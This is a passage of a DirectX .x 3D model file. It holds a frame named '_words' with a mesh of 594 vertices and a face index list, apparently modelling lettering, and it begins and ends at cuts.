0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.000000;0.000000;0.000000;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _intake Frame _words { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh words { 594; -0.898735;1.090915;-0.824353;, -0.993186;1.096523;-0.824350;, -0.993165;1.096523;-0.008734;, -0.898712;1.090915;-0.008737;, -0.994902;1.067624;-0.824350;, -0.900449;1.062016;-0.824353;, -0.900428;1.062016;-0.008736;, -0.994881;1.067624;-0.008734;, -0.976958;1.086239;-0.188293;, -0.976957;1.086239;-0.178309;, -0.927313;1.083292;-0.178310;, -0.927313;1.083292;-0.143961;, -0.920588;1.082892;-0.143961;, -0.920590;1.082892;-0.188294;, -0.919572;1.100025;-0.188295;, -0.975941;1.103372;-0.188293;, -0.975940;1.103372;-0.178309;, -0.926297;1.100425;-0.178310;, -0.926295;1.100425;-0.143961;, -0.919571;1.100025;-0.143962;, -0.920588;1.082892;-0.115831;, -0.976957;1.086239;-0.142211;, -0.976956;1.086239;-0.130794;, -0.929360;1.083413;-0.109880;, -0.976955;1.086239;-0.087385;, -0.976955;1.086239;-0.076500;, -0.920588;1.082892;-0.104731;, -0.919571;1.100025;-0.104731;, -0.919571;1.100025;-0.115831;, -0.975940;1.103372;-0.142211;, -0.975939;1.103372;-0.130794;, -0.928343;1.100546;-0.109880;, -0.975938;1.103372;-0.087385;, -0.975937;1.103372;-0.076500;, -0.976955;1.086239;-0.066104;, -0.976954;1.086239;-0.019245;, -0.970301;1.085844;-0.019245;, -0.970303;1.085844;-0.056023;, -0.953157;1.084826;-0.056023;, -0.953156;1.084826;-0.020775;, -0.946486;1.084430;-0.020775;, -0.946486;1.084430;-0.056024;, -0.927311;1.083292;-0.056024;, -0.927310;1.083292;-0.018398;, -0.920585;1.082892;-0.018398;, -0.920587;1.082892;-0.066106;, -0.919570;1.100025;-0.066106;, -0.975937;1.103372;-0.066104;, -0.975936;1.103372;-0.019245;, -0.969285;1.102977;-0.019245;, -0.969285;1.102977;-0.056023;, -0.952139;1.101959;-0.056023;, -0.952139;1.101959;-0.020775;, -0.945468;1.101563;-0.020775;, -0.945469;1.101563;-0.056024;, -0.926293;1.100425;-0.056024;, -0.926293;1.100425;-0.018398;, -0.919569;1.100025;-0.018398;, -0.920607;1.082892;-0.815206;, -0.976974;1.086239;-0.815205;, -0.976974;1.086239;-0.794046;, -0.976702;1.086223;-0.783649;, -0.976213;1.086194;-0.779132;, -0.974580;1.086097;-0.772717;, -0.972115;1.085951;-0.767324;, -0.968417;1.085731;-0.762395;, -0.963397;1.085433;-0.758289;, -0.958050;1.085116;-0.755763;, -0.951399;1.084721;-0.754328;, -0.943949;1.084279;-0.754402;, -0.937389;1.083889;-0.756104;, -0.931498;1.083539;-0.759381;, -0.927275;1.083288;-0.763486;, -0.924014;1.083095;-0.768880;, -0.921819;1.082964;-0.775391;, -0.921004;1.082916;-0.780759;, -0.920607;1.082892;-0.791328;, -0.927312;1.083291;-0.788994;, -0.927584;1.083307;-0.783675;, -0.928272;1.083348;-0.779496;, -0.929776;1.083437;-0.775052;, -0.931969;1.083567;-0.771430;, -0.934978;1.083746;-0.768514;, -0.939383;1.084007;-0.766160;, -0.944166;1.084291;-0.764971;, -0.950147;1.084646;-0.764798;, -0.955966;1.084992;-0.765820;, -0.960135;1.085239;-0.767591;, -0.963742;1.085454;-0.770339;, -0.966643;1.085626;-0.773862;, -0.968671;1.085746;-0.777698;, -0.969960;1.085823;-0.781755;, -0.970574;1.085859;-0.785643;, -0.970811;1.085873;-0.790767;, -0.970811;1.085873;-0.805123;, -0.927312;1.083291;-0.805125;, -0.919589;1.100025;-0.791328;, -0.919590;1.100025;-0.815206;, -0.975957;1.103372;-0.815205;, -0.975957;1.103372;-0.794046;, -0.975684;1.103356;-0.783649;, -0.975195;1.103327;-0.779132;, -0.973562;1.103230;-0.772717;, -0.971097;1.103084;-0.767324;, -0.967401;1.102864;-0.762395;, -0.962379;1.102566;-0.758289;, -0.957032;1.102249;-0.755763;, -0.950381;1.101854;-0.754328;, -0.942933;1.101411;-0.754402;, -0.936370;1.101022;-0.756104;, -0.930480;1.100672;-0.759381;, -0.926259;1.100421;-0.763486;, -0.922996;1.100228;-0.768880;, -0.920803;1.100098;-0.775391;, -0.919987;1.100049;-0.780759;, -0.926295;1.100424;-0.805125;, -0.926294;1.100424;-0.788994;, -0.926567;1.100440;-0.783675;, -0.927255;1.100481;-0.779496;, -0.928760;1.100570;-0.775052;, -0.930953;1.100700;-0.771430;, -0.933960;1.100879;-0.768514;, -0.938366;1.101140;-0.766160;, -0.943150;1.101424;-0.764971;, -0.949131;1.101779;-0.764798;, -0.954949;1.102125;-0.765820;, -0.959117;1.102372;-0.767591;, -0.962725;1.102587;-0.770339;, -0.965626;1.102759;-0.773862;, -0.967654;1.102879;-0.777698;, -0.968942;1.102956;-0.781755;, -0.969558;1.102992;-0.785643;, -0.969793;1.103006;-0.790767;, -0.969794;1.103006;-0.805123;, -0.956164;1.085004;-0.742014;, -0.961565;1.085324;-0.740289;, -0.966605;1.085624;-0.737228;, -0.970448;1.085852;-0.733462;, -0.973711;1.086046;-0.728361;, -0.976119;1.086189;-0.722167;, -0.977388;1.086264;-0.715948;, -0.977878;1.086293;-0.708149;, -0.977388;1.086264;-0.700232;, -0.976118;1.086189;-0.694012;, -0.973710;1.086046;-0.687914;, -0.970373;1.085848;-0.682812;, -0.966134;1.085596;-0.678780;, -0.960751;1.085276;-0.675746;, -0.955565;1.084968;-0.674285;, -0.948641;1.084557;-0.673728;, -0.941808;1.084151;-0.674360;, -0.936606;1.083843;-0.675865;, -0.931333;1.083529;-0.678806;, -0.927327;1.083292;-0.682546;, -0.924066;1.083098;-0.687481;, -0.921582;1.082951;-0.693649;, -0.920206;1.082869;-0.700159;, -0.919679;1.082838;-0.708151;, -0.920206;1.082869;-0.716095;, -0.921582;1.082951;-0.722556;, -0.924029;1.083096;-0.728654;, -0.927329;1.083292;-0.733658;, -0.931299;1.083527;-0.737472;, -0.936463;1.083834;-0.740484;, -0.941537;1.084135;-0.742038;, -0.948643;1.084557;-0.742694;, -0.949023;1.084580;-0.731860;, -0.943750;1.084267;-0.731398;, -0.939308;1.084003;-0.730208;, -0.934977;1.083746;-0.728071;, -0.932041;1.083571;-0.725691;, -0.929412;1.083415;-0.722191;, -0.927547;1.083305;-0.718014;, -0.926548;1.083245;-0.713689;, -0.926187;1.083224;-0.708224;, -0.926584;1.083248;-0.702806;, -0.927619;1.083309;-0.698336;, -0.929484;1.083420;-0.694013;, -0.931932;1.083565;-0.690663;, -0.934832;1.083737;-0.688280;, -0.939217;1.083998;-0.686192;, -0.943731;1.084266;-0.685047;, -0.948896;1.084572;-0.684588;, -0.954387;1.084898;-0.684998;, -0.958918;1.085167;-0.686217;, -0.963050;1.085413;-0.688328;, -0.965952;1.085585;-0.690830;, -0.968379;1.085729;-0.694279;, -0.970245;1.085840;-0.698626;, -0.971281;1.085901;-0.703121;, -0.971659;1.085924;-0.708223;, -0.971298;1.085902;-0.713325;, -0.970301;1.085843;-0.717769;, -0.968434;1.085733;-0.722143;, -0.965953;1.085585;-0.725617;, -0.963089;1.085415;-0.728070;, -0.958955;1.085169;-0.730207;, -0.954552;1.084908;-0.731422;, -0.947625;1.101690;-0.742694;, -0.955147;1.102137;-0.742014;, -0.960548;1.102457;-0.740289;, -0.965588;1.102757;-0.737228;, -0.969431;1.102985;-0.733462;, -0.972693;1.103179;-0.728361;, -0.975101;1.103322;-0.722167;, -0.976371;1.103397;-0.715948;, -0.976861;1.103426;-0.708149;, -0.976370;1.103397;-0.700232;, -0.975101;1.103322;-0.694012;, -0.972692;1.103179;-0.687914;, -0.969357;1.102981;-0.682812;, -0.965116;1.102729;-0.678780;, -0.959733;1.102409;-0.675746;, -0.954547;1.102101;-0.674285;, -0.947624;1.101690;-0.673728;, -0.940792;1.101284;-0.674360;, -0.935589;1.100976;-0.675865;, -0.930315;1.100663;-0.678806;, -0.926311;1.100425;-0.682546;, -0.923048;1.100231;-0.687481;, -0.920566;1.100083;-0.693649;, -0.919188;1.100002;-0.700159;, -0.918663;1.099970;-0.708151;, -0.919188;1.100002;-0.716095;, -0.920566;1.100083;-0.722556;, -0.923011;1.100229;-0.728654;, -0.926312;1.100425;-0.733658;, -0.930281;1.100660;-0.737472;, -0.935446;1.100967;-0.740484;, -0.940520;1.101268;-0.742038;, -0.953535;1.102041;-0.731422;, -0.948006;1.101713;-0.731860;, -0.942733;1.101400;-0.731398;, -0.938293;1.101136;-0.730208;, -0.933960;1.100879;-0.728071;, -0.931024;1.100704;-0.725691;, -0.928394;1.100548;-0.722191;, -0.926528;1.100437;-0.718014;, -0.925531;1.100378;-0.713689;, -0.925169;1.100357;-0.708224;, -0.925567;1.100380;-0.702806;, -0.926600;1.100442;-0.698336;, -0.928467;1.100553;-0.694013;, -0.930914;1.100698;-0.690663;, -0.933815;1.100870;-0.688280;, -0.938200;1.101130;-0.686192;, -0.942713;1.101399;-0.685047;, -0.947878;1.101705;-0.684589;, -0.953370;1.102031;-0.684998;, -0.957900;1.102300;-0.686217;, -0.962033;1.102546;-0.688328;, -0.964935;1.102718;-0.690830;, -0.967361;1.102862;-0.694279;, -0.969228;1.102973;-0.698626;, -0.970263;1.103034;-0.703121;, -0.970642;1.103057;-0.708223;, -0.970282;1.103035;-0.713325;, -0.969285;1.102976;-0.717769;, -0.967417;1.102865;-0.722143;, -0.964936;1.102718;-0.725617;, -0.962072;1.102548;-0.728070;, -0.957938;1.102302;-0.730207;, -0.920602;1.082892;-0.659009;, -0.976970;1.086239;-0.659007;, -0.976970;1.086239;-0.648732;, -0.952938;1.084812;-0.648733;, -0.952936;1.084812;-0.611640;, -0.976969;1.086239;-0.611640;, -0.976968;1.086239;-0.601559;, -0.920601;1.082892;-0.601560;, -0.920601;1.082892;-0.611641;, -0.946212;1.084413;-0.611640;, -0.946212;1.084413;-0.648733;, -0.920602;1.082892;-0.648734;, -0.919584;1.100025;-0.648734;, -0.919586;1.100025;-0.659009;, -0.975954;1.103372;-0.659007;, -0.975954;1.103372;-0.648732;, -0.951921;1.101945;-0.648733;, -0.951920;1.101945;-0.611640;, -0.975952;1.103372;-0.611640;, -0.975951;1.103372;-0.601559;, -0.919583;1.100025;-0.601560;, -0.919583;1.100025;-0.611641;, -0.945194;1.101546;-0.611640;, -0.945195;1.101546;-0.648733;, -0.933939;1.083685;-0.528025;, -0.933050;1.083632;-0.528173;, -0.930803;1.083498;-0.528923;, -0.928664;1.083371;-0.530187;, -0.926435;1.083239;-0.532205;, -0.924406;1.083118;-0.534924;, -0.922484;1.083004;-0.538689;, -0.920980;1.082915;-0.543283;, -0.920019;1.082858;-0.548673;, -0.919675;1.082838;-0.555500;, -0.920165;1.082867;-0.562933;, -0.921342;1.082937;-0.568497;, -0.923645;1.083073;-0.574059;, -0.926853;1.083264;-0.578700;, -0.930805;1.083498;-0.582197;, -0.936205;1.083819;-0.584991;, -0.941552;1.084136;-0.586424;, -0.948441;1.084545;-0.586958;, -0.955199;1.084947;-0.586399;, -0.960383;1.085254;-0.585014;, -0.965733;1.085572;-0.582245;, -0.969988;1.085825;-0.578601;, -0.973614;1.086040;-0.573669;, -0.976044;1.086184;-0.568228;, -0.977277;1.086258;-0.562836;, -0.977855;1.086292;-0.555452;, -0.977545;1.086274;-0.548284;, -0.976552;1.086215;-0.542650;, -0.974828;1.086112;-0.537622;, -0.972633;1.085982;-0.533783;, -0.969973;1.085824;-0.530891;, -0.967108;1.085654;-0.529120;, -0.965496;1.085558;-0.528607;, -0.962161;1.085360;-0.528074;, -0.962161;1.085360;-0.538737;, -0.963881;1.085462;-0.539127;, -0.964715;1.085512;-0.539418;, -0.966346;1.085609;-0.540464;, -0.968070;1.085711;-0.542260;, -0.969681;1.085807;-0.544786;, -0.970860;1.085877;-0.547653;, -0.971655;1.085924;-0.551248;, -0.971910;1.085939;-0.555402;, -0.971493;1.085914;-0.559774;, -0.970478;1.085854;-0.563564;, -0.968559;1.085740;-0.567403;, -0.965801;1.085576;-0.570682;, -0.962684;1.085391;-0.572942;, -0.958138;1.085121;-0.574837;, -0.953695;1.084857;-0.575808;, -0.948694;1.084560;-0.576148;, -0.943002;1.084223;-0.575662;, -0.938253;1.083941;-0.574399;, -0.934048;1.083691;-0.572286;, -0.931113;1.083517;-0.569833;, -0.928756;1.083377;-0.566627;, -0.927198;1.083284;-0.563079;, -0.926399;1.083237;-0.559410;, -0.926163;1.083223;-0.554723;, -0.926544;1.083245;-0.550447;, -0.927361;1.083294;-0.547022;, -0.928519;1.083363;-0.544277;, -0.929915;1.083445;-0.542212;, -0.931474;1.083538;-0.540756;, -0.933288;1.083646;-0.539734;, -0.934103;1.083694;-0.539468;, -0.935752;1.083792;-0.539078;, -0.935751;1.083792;-0.527857;, -0.934734;1.100925;-0.527858;, -0.932921;1.100817;-0.528025;, -0.932034;1.100765;-0.528173;, -0.929786;1.100631;-0.528923;, -0.927648;1.100504;-0.530187;, -0.925418;1.100372;-0.532205;, -0.923388;1.100251;-0.534924;, -0.921466;1.100137;-0.538689;, -0.919962;1.100048;-0.543283;, -0.919003;1.099991;-0.548673;, -0.918658;1.099970;-0.555500;, -0.919147;1.099999;-0.562934;, -0.920325;1.100070;-0.568497;, -0.922628;1.100206;-0.574059;, -0.925837;1.100397;-0.578700;, -0.929787;1.100631;-0.582197;, -0.935188;1.100952;-0.584991;, -0.940536;1.101269;-0.586424;, -0.947423;1.101678;-0.586958;, -0.954182;1.102080;-0.586399;, -0.959365;1.102388;-0.585014;, -0.964715;1.102705;-0.582245;, -0.968970;1.102958;-0.578601;, -0.972598;1.103173;-0.573669;, -0.975028;1.103317;-0.568228;, -0.976259;1.103391;-0.562836;, -0.976839;1.103425;-0.555452;, -0.976528;1.103407;-0.548284;, -0.975533;1.103348;-0.542650;, -0.973811;1.103245;-0.537622;, -0.971616;1.103115;-0.533783;, -0.968956;1.102957;-0.530891;, -0.966090;1.102787;-0.529120;, -0.964478;1.102691;-0.528607;, -0.961143;1.102493;-0.528074;, -0.961143;1.102493;-0.538737;, -0.962862;1.102595;-0.539127;, -0.963698;1.102645;-0.539418;, -0.965328;1.102742;-0.540464;, -0.967052;1.102844;-0.542260;, -0.968666;1.102940;-0.544786;, -0.969843;1.103010;-0.547653;, -0.970637;1.103057;-0.551248;, -0.970892;1.103072;-0.555402;, -0.970476;1.103047;-0.559774;, -0.969460;1.102987;-0.563564;, -0.967542;1.102873;-0.567403;, -0.964785;1.102709;-0.570682;, -0.961668;1.102524;-0.572942;, -0.957120;1.102254;-0.574837;, -0.952678;1.101990;-0.575808;, -0.947678;1.101693;-0.576148;, -0.941986;1.101356;-0.575662;, -0.937236;1.101073;-0.574399;, -0.933032;1.100824;-0.572286;, -0.930095;1.100649;-0.569833;, -0.927738;1.100510;-0.566627;, -0.926180;1.100417;-0.563079;, -0.925384;1.100370;-0.559410;, -0.925147;1.100356;-0.554723;, -0.925528;1.100378;-0.550447;, -0.926343;1.100427;-0.547023;, -0.927502;1.100496;-0.544277;, -0.928897;1.100579;-0.542212;, -0.930456;1.100671;-0.540756;, -0.932270;1.100779;-0.539734;, -0.933085;1.100827;-0.539468;, -0.934734;1.100925;-0.539078;, -0.920599;1.082892;-0.482426;, -0.928391;1.083355;-0.482426;, -0.931165;1.083520;-0.478102;, -0.932579;1.083604;-0.475988;, -0.935405;1.083772;-0.472053;, -0.942439;1.084189;-0.462968;, -0.947476;1.084488;-0.456676;, -0.949634;1.084616;-0.454125;, -0.952985;1.084815;-0.450651;, -0.955269;1.084951;-0.448830;, -0.958352;1.085134;-0.447298;, -0.961178;1.085302;-0.446837;, -0.963152;1.085419;-0.447081;, -0.964856;1.085520;-0.447784;, -0.966163;1.085598;-0.448731;, -0.967287;1.085665;-0.449970;, -0.968266;1.085723;-0.451573;, -0.969028;1.085768;-0.453518;, -0.969532;1.085798;-0.455728;, -0.969749;1.085811;-0.458205;, -0.969625;1.085803;-0.460951;, -0.969116;1.085773;-0.463428;, -0.968155;1.085716;-0.465858;, -0.966940;1.085644;-0.467606;, -0.965420;1.085554;-0.468846;, -0.963356;1.085431;-0.469721;, -0.962375;1.085373;-0.469914;, -0.960435;1.085258;-0.470109;, -0.960435;1.085258;-0.481186;, -0.964441;1.085496;-0.480506;, -0.966382;1.085611;-0.479874;, -0.969625;1.085803;-0.477810;, -0.972253;1.085959;-0.474773;, -0.974027;1.086065;-0.471323;, -0.975353;1.086144;-0.466805;, -0.975930;1.086178;-0.462796;, -0.976060;1.086186;-0.458351;, -0.975696;1.086164;-0.453833;, -0.974900;1.086117;-0.449777;, -0.973611;1.086040;-0.445963;, -0.972035;1.085947;-0.442901;, -0.969733;1.085810;-0.440010;, -0.967143;1.085656;-0.438019;, -0.964439;1.085496;-0.436948;, -0.961050;1.085294;-0.436588;, -0.957426;1.085079;-0.437072;, -0.954073;1.084880;-0.438384;, -0.950991;1.084697;-0.440425;, -0.947239;1.084474;-0.443970;, -0.944993;1.084341;-0.446595;, -0.939846;1.084035;-0.453252;, -0.926995;1.083272;-0.470426;, -0.926994;1.083272;-0.436683;, -0.920598;1.082892;-0.436683;, -0.919580;1.100025;-0.436683;, -0.919581;1.100025;-0.482426;, -0.927374;1.100488;-0.482426;, -0.930147;1.100653;-0.478102;, -0.931561;1.100737;-0.475988;, -0.934388;1.100905;-0.472053;, -0.941421;1.101322;-0.462968;, -0.946458;1.101621;-0.456676;, -0.948617;1.101749;-0.454125;, -0.951968;1.101948;-0.450651;, -0.954252;1.102084;-0.448830;, -0.957335;1.102267;-0.447298;, -0.960161;1.102435;-0.446837;, -0.962134;1.102552;-0.447081;, -0.963840;1.102653;-0.447784;, -0.965147;1.102731;-0.448731;, -0.966269;1.102797;-0.449970;, -0.967248;1.102856;-0.451573;, -0.968010;1.102901;-0.453518;, -0.968515;1.102931;-0.455728;, -0.968731;1.102944;-0.458205;, -0.968607;1.102936;-0.460951;, -0.968100;1.102906;-0.463428;, -0.967137;1.102849;-0.465858;, -0.965923;1.102777;-0.467606;, -0.964402;1.102687;-0.468846;, -0.962337;1.102564;-0.469721;, -0.961359;1.102506;-0.469914;, -0.959418;1.102391;-0.470109;, -0.959418;1.102391;-0.481186;, -0.963423;1.102629;-0.480506;, -0.965364;1.102744;-0.479874;, -0.968607;1.102936;-0.477810;, -0.971236;1.103092;-0.474773;, -0.973011;1.103198;-0.471323;, -0.974336;1.103277;-0.466805;, -0.974914;1.103311;-0.462796;, -0.975042;1.103318;-0.458351;, -0.974679;1.103297;-0.453833;, -0.973882;1.103250;-0.449777;, -0.972593;1.103173;-0.445963;, -0.971018;1.103080;-0.442901;, -0.968718;1.102943;-0.440010;, -0.966125;1.102789;-0.438019;, -0.963423;1.102629;-0.436948;, -0.960032;1.102427;-0.436588;, -0.956408;1.102212;-0.437072;, -0.953055;1.102013;-0.438385;, -0.949975;1.101830;-0.440425;, -0.946222;1.101607;-0.443970;, -0.943975;1.101474;-0.446595;, -0.938828;1.101168;-0.453252;, -0.925978;1.100405;-0.470426;, -0.925977;1.100405;-0.436683;, -0.932376;1.083592;-0.394733;, -0.932377;1.083592;-0.427842;, -0.941857;1.084155;-0.427842;, -0.975152;1.086132;-0.396649;, -0.975152;1.086132;-0.384917;, -0.938828;1.083975;-0.384918;, -0.938828;1.083975;-0.375126;, -0.932376;1.083592;-0.375126;, -0.932376;1.083592;-0.384919;, -0.920595;1.082892;-0.384919;, -0.920595;1.082892;-0.394733;, -0.938828;1.083975;-0.394733;, -0.967229;1.085661;-0.394732;, -0.938829;1.083975;-0.419922;, -0.919579;1.100025;-0.394733;, -0.931359;1.100725;-0.394733;, -0.931359;1.100725;-0.427842;, -0.940839;1.101288;-0.427842;, -0.974135;1.103265;-0.396649;, -0.974134;1.103265;-0.384917;, -0.937811;1.101108;-0.384918;, -0.937811;1.101108;-0.375126;, -0.931358;1.100725;-0.375126;, -0.931359;1.100725;-0.384919;, -0.919579;1.100025;-0.384919;, -0.937812;1.101108;-0.419922;, -0.937811;1.101108;-0.394733;, -0.966212;1.102794;-0.394732;, -0.920593;1.082892;-0.309681;, -0.976963;1.086239;-0.336062;, -0.976962;1.086239;-0.324644;, -0.929364;1.083413;-0.303730;, -0.976960;1.086239;-0.281236;, -0.976960;1.086239;-0.270350;, -0.920593;1.082892;-0.298581;, -0.919576;1.100025;-0.298581;, -0.919576;1.100025;-0.309681;, -0.975945;1.103372;-0.336062;, -0.975945;1.103372;-0.324644;, -0.928349;1.100546;-0.303730;, -0.975944;1.103372;-0.281236;, -0.975944;1.103372;-0.270350;, -0.920592;1.082892;-0.271082;, -0.976959;1.086239;-0.239040;, -0.976959;1.086239;-0.228228;, -0.920590;1.082892;-0.197840;, -0.920590;1.082892;-0.209672;, -0.935163;1.083758;-0.217177;, -0.935164;1.083758;-0.252279;, -0.920592;1.082892;-0.260587;, -0.941598;1.084140;-0.220335;, -0.969347;1.085787;-0.234157;, -0.941599;1.084140;-0.248926;, -0.919575;1.100025;-0.260587;, -0.919575;1.100025;-0.271082;, -0.975943;1.103372;-0.239040;, -0.975943;1.103372;-0.228228;, -0.919573;1.100025;-0.197840;, -0.919573;1.100025;-0.209672;, -0.934146;1.100891;-0.217177;, -0.934146;1.100891;-0.252280;, -0.940581;1.101273;-0.248926;, -0.940580;1.101273;-0.220335;, -0.968328;1.102920;-0.234157;; 582; 4;3,0,1,2;, 4;5,0,3,6;, 4;4,1,0,5;, 4;5,6,7,4;, 4;7,2,1,4;, 4;6,3,2,7;, 4;48,35,36,49;, 4;49,36,37,50;, 4;50,37,38,51;, 4;51,38,39,52;, 4;52,39,40,53;, 4;53,40,41,54;, 4;54,41,42,55;, 4;55,42,43,56;, 4;56,43,44,57;, 4;57,44,45,46;, 4;46,45,34,47;, 4;47,34,35,48;, 4;49,50,47,48;, 4;32,24,25,33;, 4;33,25,26,27;, 4;27,26,20,28;, 4;28,20,21,29;, 4;21,20,23,22;, 4;29,21,22,30;, 4;30,22,23,31;, 4;31,23,24,32;, 4;18,11,12,19;, 4;17,10,11,18;, 4;16,9,10,17;, 4;15,8,9,16;, 4;14,13,8,15;, 4;19,12,13,14;, 4;587,575,576,588;, 4;588,576,577,589;, 4;589,577,578,590;, 4;590,578,579,583;, 4;583,579,572,584;, 4;584,572,573,585;, 4;585,573,574,586;, 4;586,574,575,587;, 4;592,580,581,593;, 4;591,582,580,592;, 4;593,581,582,591;, 3;582,581,580;, 4;570,562,563,571;, 4;571,563,564,565;, 4;565,564,558,566;, 4;566,558,559,567;, 4;567,559,560,568;, 4;568,560,561,569;, 4;569,561,562,570;, 4;551,536,537,552;, 4;550,535,536,551;, 4;549,534,535,550;, 4;548,533,534,549;, 4;547,532,533,548;, 4;546,531,532,547;, 4;545,530,531,546;, 4;544,540,530,545;, 4;554,539,540,544;, 4;553,538,539,554;, 4;552,537,538,553;, 4;556,541,542,557;, 4;555,543,541,556;, 4;557,542,543,555;, 3;543,542,541;, 4;529,474,475,476;, 4;528,473,474,529;, 4;476,475,422,477;, 4;477,422,423,478;, 4;504,449,450,505;, 4;388,319,320,389;, 4;421,352,353,354;, 4;297,296,342,341;, 4;281,268,269,282;, 4;280,267,268,281;, 4;279,266,267,280;, 4;278,265,266,279;, 4;277,264,265,278;, 4;276,263,264,277;, 4;275,262,263,276;, 4;275,276,285,274;, 4;274,273,262,275;, 4;285,272,273,274;, 4;284,271,272,285;, 4;283,270,271,284;, 4;282,269,270,283;, 4;133,94,95,115;, 4;97,58,59,98;, 4;115,116,96,97;, 4;97,98,133,115;, 4;98,99,132,133;, 4;99,100,131,132;, 4;100,101,130,131;, 4;101,102,129,130;, 4;102,103,128,129;, 4;103,104,127,128;, 4;104,105,126,127;, 4;105,106,125,126;, 4;106,107,124,125;, 4;107,108,123,124;, 4;108,109,122,123;, 4;109,110,121,122;, 5;111,112,120,121,110;, 3;120,112,119;, 4;112,113,118,119;, 4;113,114,117,118;, 4;114,96,116,117;, 4;96,76,58,97;, 4;114,75,76,96;, 4;113,74,75,114;, 4;112,73,74,113;, 4;111,72,73,112;, 4;110,71,72,111;, 4;109,70,71,110;, 4;108,69,70,109;, 4;107,68,69,108;, 4;106,67,68,107;, 4;105,66,67,106;, 4;104,65,66,105;, 4;103,64,65,104;, 4;102,63,64,103;, 4;101,62,63,102;, 4;100,61,62,101;, 4;99,60,61,100;, 4;98,59,60,99;, 4;59,58,95,94;, 4;58,76,77,95;, 4;76,75,78,77;, 4;75,74,79,78;, 4;74,73,80,79;, 3;80,73,81;, 5;72,71,82,81,73;, 4;71,70,83,82;, 4;70,69,84,83;, 4;69,68,85,84;, 4;68,67,86,85;, 4;67,66,87,86;, 4;66,65,88,87;, 4;65,64,89,88;, 4;64,63,90,89;, 4;63,62,91,90;, 4;62,61,92,91;, 4;61,60,93,92;, 4;94,93,60,59;, 4;115,95,77,116;, 4;116,77,78,117;, 4;117,78,79,118;, 4;118,79,80,119;, 4;119,80,81,120;, 4;120,81,82,121;, 4;121,82,83,122;, 4;122,83,84,123;, 4;123,84,85,124;, 4;124,85,86,125;, 4;125,86,87,126;, 4;126,87,88,127;, 4;127,88,89,128;, 4;128,89,90,129;, 4;129,90,91,130;, 4;130,91,92,131;, 4;131,92,93,132;, 4;132,93,94,133;, 4;229,164,165,198;, 4;198,165,134,199;, 4;199,134,135,200;, 4;200,135,136,201;, 4;201,136,137,202;, 4;202,137,138,203;, 4;203,138,139,204;, 4;204,139,140,205;, 4;205,140,141,206;, 4;206,141,142,207;, 4;207,142,143,208;, 4;208,143,144,209;, 4;209,144,145,210;, 4;210,145,146,211;, 4;211,146,147,212;, 4;212,147,148,213;, 4;213,148,149,214;, 4;214,149,150,215;, 4;215,150,151,216;, 4;216,151,152,217;, 4;217,152,153,218;, 4;218,153,154,219;, 4;219,154,155,220;, 4;220,155,156,221;, 4;221,156,157,222;, 4;222,157,158,223;, 4;223,158,159,224;, 4;224,159,160,225;, 4;225,160,161,226;, 4;226,161,162,227;, 4;227,162,163,228;, 4;228,163,164,229;, 4;229,198,231,232;, 4;198,199,230,231;, 4;199,200,261,230;, 4;200,201,260,261;, 4;201,202,259,260;, 4;202,203,258,259;, 4;203,204,257,258;, 4;204,205,256,257;, 4;205,206,255,256;, 4;206,207,254,255;, 4;207,208,253,254;, 4;208,209,252,253;, 4;209,210,251,252;, 4;210,211,250,251;, 4;211,212,249,250;, 4;212,213,248,249;, 4;213,214,247,248;, 4;214,215,246,247;, 4;215,216,245,246;, 5;244,245,216,217,218;, 3;244,218,243;, 5;242,243,218,219,220;, 3;242,220,241;, 4;220,221,240,241;, 4;221,222,239,240;, 4;222,223,238,239;, 4;223,224,237,238;, 4;224,225,236,237;, 4;225,226,235,236;, 4;226,227,234,235;, 4;227,228,233,234;, 4;228,229,232,233;, 4;165,164,167,166;, 4;134,165,166,197;, 4;135,134,197,196;, 4;136,135,196,195;, 4;137,136,195,194;, 4;138,137,194,193;, 4;139,138,193,192;, 4;140,139,192,191;, 4;141,140,191,190;, 4;142,141,190,189;, 4;143,142,189,188;, 5;144,143,188,187,145;, 3;186,145,187;, 4;146,145,186,185;, 4;185,184,147,146;, 4;148,147,184,183;, 4;149,148,183,182;, 4;150,149,182,181;, 4;151,150,181,180;, 4;152,151,180,179;, 4;153,152,179,178;, 4;154,153,178,177;, 4;155,154,177,176;, 4;156,155,176,175;, 4;157,156,175,174;, 4;158,157,174,173;, 4;159,158,173,172;, 4;160,159,172,171;, 4;161,160,171,170;, 4;162,161,170,169;, 4;163,162,169,168;, 4;164,163,168,167;, 4;231,166,167,232;, 4;230,197,166,231;, 4;261,196,197,230;, 4;260,195,196,261;, 4;259,194,195,260;, 4;258,193,194,259;, 4;257,192,193,258;, 4;256,191,192,257;, 4;255,190,191,256;, 4;254,189,190,255;, 4;253,188,189,254;, 4;252,187,188,253;, 4;251,186,187,252;, 4;250,185,186,251;, 4;249,184,185,250;, 4;248,183,184,249;, 4;247,182,183,248;, 4;246,181,182,247;, 4;245,180,181,246;, 4;244,179,180,245;, 4;243,178,179,244;, 4;242,177,178,243;, 4;241,176,177,242;, 4;240,175,176,241;, 4;239,174,175,240;, 4;238,173,174,239;, 4;237,172,173,238;, 4;236,171,172,237;, 4;235,170,171,236;, 4;234,169,170,235;, 4;233,168,169,234;, 4;232,167,168,233;, 4;272,263,262,273;, 3;265,263,272;, 3;263,265,264;, 4;272,271,266,265;, 4;267,266,271,268;, 4;269,268,271,270;, 3;276,278,285;, 3;278,276,277;, 4;284,285,278,279;, 3;279,281,284;, 3;281,279,280;, 4;283,284,281,282;, 4;371,372,405,406;, 4;372,373,404,405;, 4;373,374,403,404;, 4;374,375,402,403;, 4;375,376,401,402;, 4;376,377,400,401;, 4;377,378,399,400;, 4;378,379,398,399;, 4;379,380,397,398;, 4;380,381,396,397;, 3;396,381,395;, 4;381,382,394,395;, 4;382,383,393,394;, 4;383,384,392,393;, 4;384,385,391,392;, 4;385,386,390,391;, 5;389,390,386,387,388;, 6;356,357,420,421,354,355;, 4;357,358,419,420;, 4;358,359,418,419;, 4;359,360,417,418;, 4;360,361,416,417;, 4;361,362,415,416;, 4;362,363,414,415;, 4;363,364,413,414;, 4;364,365,412,413;, 3;412,365,411;, 4;365,366,410,411;, 